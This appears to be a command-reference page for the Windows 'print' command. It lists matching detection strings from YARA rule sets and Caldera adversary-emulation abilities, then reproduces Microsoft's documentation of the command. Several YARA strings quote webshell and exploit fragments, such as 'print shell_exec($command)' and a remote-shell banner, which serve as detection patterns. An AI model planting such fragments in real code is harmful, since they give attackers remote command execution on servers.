| signature-base | apt_eqgrp.yar | $s1 = "print "[+] Connecting to %s:%s" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s6 = "print "[-] keyboard interrupt before response received"" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s8 = "print 'Debug info ','='*40" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp_apr17.yar | $s2 = "print "java -jar jscanner.jar$scanth$list\n";" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp_apr17.yar | $x1 = "print ' -s storebin use storebin as the Store executable\n'" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp_apr17.yar | $x3 = "print ' -k keyfile the key text file to inject'" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_op_wocao.yar | $a = "out.print("All seems fine.");" | CC BY-NC 4.0 |
| signature-base | apt_op_wocao.yar | $e = "out.print((char)c);}in.close()" | CC BY-NC 4.0 |
| signature-base | apt_op_wocao.yar | $f = "out.print((char)c);}er.close()" | CC BY-NC 4.0 |
| signature-base | apt_project_sauron_extras.yar | $s2 = "Print only replying Ips" | CC BY-NC 4.0 |
| signature-base | apt_pulsesecure.yar | $s3 = /if[\x09\x20]{0,32}(CGI::param([\x22\x27]\w{1,64}[\x22\x27]))\s{0,128}{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\n\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my $\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param([\x22\x27]\w{1,64}[\x22\x27])[\x09\x20]{0,32};\s{0,128}system([\x22\x27]$/ | CC BY-NC 4.0 |
| signature-base | apt_pulsesecure.yar | $s4 = /sed -i [^\r\n]{1,128}CGI::param([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param([^\r\n]{1,128}system(/ | CC BY-NC 4.0 |
| signature-base | apt_pulsesecure.yar | $r3 = /if[\x09\x20]{0,32}($\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27])\s{0,128}{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/ | CC BY-NC 4.0 |
| signature-base | apt_pulsesecure.yar | $s4 = "print $_" | CC BY-NC 4.0 |
| signature-base | apt_pulsesecure.yar | $s6 = "print MIME::Base64::encode(RC4(" | CC BY-NC 4.0 |
| signature-base | apt_sandworm_centreon.yar | $pl_socket = "socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print "$l$e$!$l" | CC BY-NC 4.0 |
| signature-base | apt_sandworm_centreon.yar | $msg1 = "print "$l OK! I\'m successful connected.$l"" | CC BY-NC 4.0 |
| signature-base | apt_sandworm_centreon.yar | $msg2 = "print "$l OK! I\'m accept connection.$l"" | CC BY-NC 4.0 |
| signature-base | cn_pentestset_scripts.yar | $s0 = "print "[*] Connected to remote host \n"; " fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_scripts.yar | $s1 = "print "Usage: $0 [Host] [Port] \n\n"; " fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | cn_pentestset_scripts.yar | $s5 = "print "[*] Resolving HostName\n"; " fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | exploit_shitrix.yar | $s07 = "template.new({'BLOCK'='print readpipe(" ascii /* TrustedSec templae */ | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s3 = "out.print("Hi,Man 2015 ");" fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s6 = "out.print("</pre>");" fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s7 = "out.print("<pre>");" fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cn_webshells.yar | $s4 = "out.print("Hi,Man 2015");" fullword ascii | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s4 = "print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = " out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s4 = "print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s8 = "print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s1 = "print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s9 = "if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s2 = "out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s7 = "if(flist[i].canRead() == true) out.print("r" ); else out.print("-");" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s5 = "print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s8 = "print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = "copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s2 = "python -c"import md5;x=md5.new('you_password');print x.hexdigest()"" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = "print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s1 = "print "Sending mail to $to....... ";" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s2 = "print "Asmodeus Perl Remote Shell" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s2 = "print "\n".'<tr><td width=100pt class=linelisting>POST (php eval)</td><" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s1 = "print "<tr><td>Server is:</td><td>".$_SERVER['SERVER_SIGNATURE']."</td" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s2 = "print "<tr><td>Execute command:</td><td><input size=100 name=\"_cmd" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s3 = "print "error; help: head -n 16 d00r.py"" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s4 = "print "PW:",PW,"PORT:",PORT,"HOST:",HOST" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s3 = "print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s2 = "print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s2 = "print(" Provenance du mail : <input type=\"text\" name=\"provenanc" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s3 = "<? if($cmd != "") print Shell_Exec($cmd);?>" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s8 = "print "<form action=\"".$me."?p=chmod&file=".$content."&d" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s18 = "print shell_exec($command);" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s5 = "print " <h1>#worst @dal.net</h1> ";" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s7 = "print " <h1>Linux Shells</h1> ";" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s14 = "print "<tr><td>System type:</td><td>$UName</td></tr>";" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s20 = "print "Transfered $TargetFileSize Bytes. ";" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s12 = "print "Sending mail to $to....... "; " fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s4 = "<? if($cmd != "") print Shell_Exec($cmd);?>" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s12 = "print << "[kalabanga]";" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s5 = "print " [ Generation time: \".round(getTime()-startTime,4).\" second" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s6 = "print "Sorry, none of the command functions works.";" fullword | CC BY-NC 4.0 |
signature-base thor-webshells.yar $s3 = “print("<p align=\"center\"><font size=\"5\">Exploit include “ CC BY-NC 4.0
stockpile b007fe0c-c6b0-4fda-915c-255bbc070de2.yml description: copy the contents for the clipboard and print them Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml - source: host.print.file Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml target: host.print.size Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml name: Print Working Directory Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml description: Print the current working directory on the system Apache-2.0
stockpile a41c2324-8c63-4b15-b3c5-84f920d1f226.yml command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.

print

Sends a text file to a printer. A file can print in the background if you send it to a printer connected to a serial or parallel port on the local computer.

Note: You can perform many configuration tasks from the command prompt by using the Mode command, including configuring a printer connected to a parallel or a serial port, displaying printer status, or preparing a printer for code page switching.

Syntax

print [/d:<printername>] [<drive>:][<path>]<filename>[ ...]

Parameters

Parameter Description
/d:<printername> Specifies the printer that you want to print the job. To print to a locally connected printer, specify the port on your computer where the printer is connected. Valid values for parallel ports are LPT1, LPT2, and LPT3. Valid values for serial ports are COM1, COM2, COM3, and COM4. You can also specify a network printer by using its queue name (\\server_name\printer_name). If you don’t specify a printer, the print job is sent to LPT1 by default.
<drive>: Specifies the logical or physical drive where the file you want to print is located. This parameter isn’t required if the file you want to print is located on the current drive.
<path> Specifies the location of the file you want to print. This parameter isn’t required if the file you want to print is located in the current directory.
<filename>[ ...] Required. Specifies the file you want to print. You can include multiple files in one command.
/? Displays help at the command prompt.

Examples

To send the report.txt file, located in the current directory, to a printer connected to lpt2 on the local computer, type:

print /d:lpt2 report.txt

To send the report.txt file, located in the c:\accounting directory, to the printer1 print queue on the \\copyroom server, type:

print /d:\\copyroom\printer1 c:\accounting\report.txt


MIT License. Copyright (c) 2020-2021 Strontic.